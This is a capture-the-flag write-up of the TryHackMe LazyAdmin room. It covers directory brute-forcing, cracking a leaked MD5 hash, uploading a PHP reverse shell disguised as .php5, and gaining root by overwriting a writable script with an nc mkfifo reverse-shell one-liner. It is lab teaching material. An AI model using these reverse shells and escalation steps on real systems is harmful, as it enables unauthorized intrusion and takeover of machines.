LazyAdmin — TryHackMe WriteUp
Hello readers, welcome to the world of cybersecurity and ethical hacking! In this article we learn from the LazyAdmin TryHackMe room beckons as an ideal launchpad for honing your Linux machine exploitation skills. Designed with accessibility in mind, this room offers an excellent opportunity for beginners to delve into the fundamentals of recon, enumeration, brute force attacks, reverse shells, and the art of privilege escalation.
Started an Nmap scan. I found 2 open ports
─$ nmap --min-rate 1000 10.10.216.6
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-30 12:46 EAT
Nmap scan report for 10.10.216.6
Host is up (0.33s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpStarted a service scan on the open ports
└─$ nmap -p22,80 -A 10.10.216.6
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-30 12:47 EAT
Nmap scan report for 10.10.216.6
Host is up (0.34s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelStarted enumerating
HTTP (Port 80)
I accessed the IP via browser. It was Apache2 Default page. Viewed the page source there was nothing interesting. /robots.txt was unreacheable.
I bruteforced directories using Gobuster
└─$ gobuster dir -u http://10.10.216.6/ --wordlist=/usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.216.6/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/content (Status: 301) [Size: 312] [--> http://10.10.216.6/content/]
/server-status (Status: 403) [Size: 276]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================On viewing the /content directory
I ran another brute force on directories and found more
─$ gobuster dir -u http://10.10.216.6/content/ --wordlist=/usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.216.6/content/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/_themes (Status: 301) [Size: 320] [--> http://10.10.216.6/content/_themes/]
/as (Status: 301) [Size: 315] [--> http://10.10.216.6/content/as/]
/attachment (Status: 301) [Size: 323] [--> http://10.10.216.6/content/attachment/]
/images (Status: 301) [Size: 319] [--> http://10.10.216.6/content/images/]
/inc (Status: 301) [Size: 316] [--> http://10.10.216.6/content/inc/]
/js (Status: 301) [Size: 315] [--> http://10.10.216.6/content/js/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================I found a log in page on /content/as. I could not find any logins so I move to check around
I went through all the directories and in /content/inc directory there was an interesting file (mysql_backup). On clicking it was able to download. I downloaded it to my local machine
On checking it’s contents I found the potential creds
It was hash(md5) on decrypting it I found (Password123). I logged in using manager:P**w%$d**3 and was successful
I checked around and got lucky on the Media Center tab because I had the ability to upload
I jumped to PentesterMonkey to get a php reverse shell. I changed the necessary parts
Then uploaded but failed. I guess .php extension is blocked so I changed to .php5
mv php-reverse-shell.php php-reverse-shell.php5I went to the /content/attachment/ directory and it was successfully uploaded.
Before clicking on it I started a listener in my local machine
I found a shell
─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.18.6.139] from (UNKNOWN) [10.10.216.6] 53776
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
13:49:14 up 1:05, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
I checked which python it was to try and get a more stable and interactive shell
$ which python
/usr/bin/python
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@THM-Chal:/home$I found the user.txt file
ww-data@THM-Chal:/home$ ls
ls
itguy
www-data@THM-Chal:/home$ cd itguy
cd itguy
www-data@THM-Chal:/home/itguy$ ls
ls
Desktop Downloads Pictures Templates backup.pl mysql_login.txt
Documents Music Public Videos examples.desktop user.txt
www-data@THM-Chal:/home/itguy$ cat user.txt
cat user.txt
THM{REDACTED}
www-data@THM-Chal:/home/itguy$It was time to escalate my privileges
ww-data@THM-Chal:/home/itguy$ sudo -l
sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.plOn checking the contents of backup.pl
www-data@THM-Chal:/home/itguy$ cat backup.pl
cat backup.pl
#!/usr/bin/perl
system("sh", "/etc/copy.sh");I also check copy.sh. From the script it is communicating with a local machine.
www-data@THM-Chal:/etc$ cat copy.sh
cat copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/fI checked on the permissions the copy.sh had
www-data@THM-Chal:/etc$ ls -lah copy.sh
ls -lah copy.sh
-rw-r--rwx 1 root root 81 Nov 29 2019 copy.sh
www-data@THM-Chal:/etc$I had permissions to read, write so I edited it
I used revshells generator to find script for this
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc #myip 5554 >/tmp/fVim or nano doesn’t work on this so I used echo command
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc #myip >/tmp/f" > copy.shI started a listener on my local machine.
└─$ nc -lnvp 5554
listening on [any] 5554 ...I then run the command
sudo /usr/bin/perl /home/itguy/backup.plAnd got a root shell
└─$ nc -lnvp 5554
listening on [any] 5554 ...
connect to [....] from (UNKNOWN) [10.10.216.6] 33188
sh: 0: can't access tty; job control turned off
# whoami
root
root@THM-Chal:/etc# cd ~
cd ~
root@THM-Chal:~# ls
ls
root.txt
root@THM-Chal:~# cat root.txt
cat root.txt
THM{REDACTED}
root@THM-Chal:~#About the author
Wilklins Nyatteng is a cyber security enthusiast with interest in penetration testing & vulnerability assessments, OSINT, cloud security. Certified Cyber Security professional by Trend Micro, 9x Microsoft Certified, CEH Master and AWS Solutions Architect — Associate.
Follow me on:
